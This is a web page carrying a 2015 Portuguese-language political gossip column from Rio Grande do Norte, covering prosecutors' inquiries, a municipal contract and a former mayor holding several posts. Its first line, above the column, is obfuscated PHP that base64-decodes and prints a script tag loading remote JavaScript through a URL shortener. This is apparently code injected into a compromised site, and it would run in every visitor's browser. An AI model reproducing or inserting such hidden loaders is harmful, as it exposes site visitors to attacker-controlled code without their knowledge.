$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

COLUNA DO DIA 2 DE OUTUBRO DE 2015

02 Out 2015

PROPAGANDA

Enganados estão os pré-candidatos que fazem propaganda antecipada e acreditam que o Ministério Público não está atento. Pelo contrário, já há alguns processos em curso e logo virão a tona.

DAMA

A promotora Hayssa Kyrie Medeiros abriu uma investigação para apurar “possível retardamento” de procedimento próprio da Procuradoria Geral do Estado para apurar os danos decorrentes dos desvios de recursos estaduais no valor de R$ 5,5 milhões da operação Dama de Espadas. No entendimento da promotora, a Procuradoria do Estado já deveria ter ajuizado ação para reaver os valores desviados.

FIO

A Prefeitura de Jundiá gastará quase R$ 420 mil com material de construção, elétrico e hidráulico. O contrato já foi publicado no Diário Oficial.

FLAGRANTE

Um caso, no mínimo, curioso a promotora Janayna Francisco identificou no Agreste. O ex-prefeito de Taipu, Francisco Marcelo Cavalcante Queiroz, está com os direitos políticos suspensos, mas está, atualmente, acumulando cargos nas prefeituras de Brejinho, João Câmara e Poço Branco. A suspeita é de crime de improbidade administrativa. O Ministério Público já solicitou documentação às Secretarias de Administração das três cidades.

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *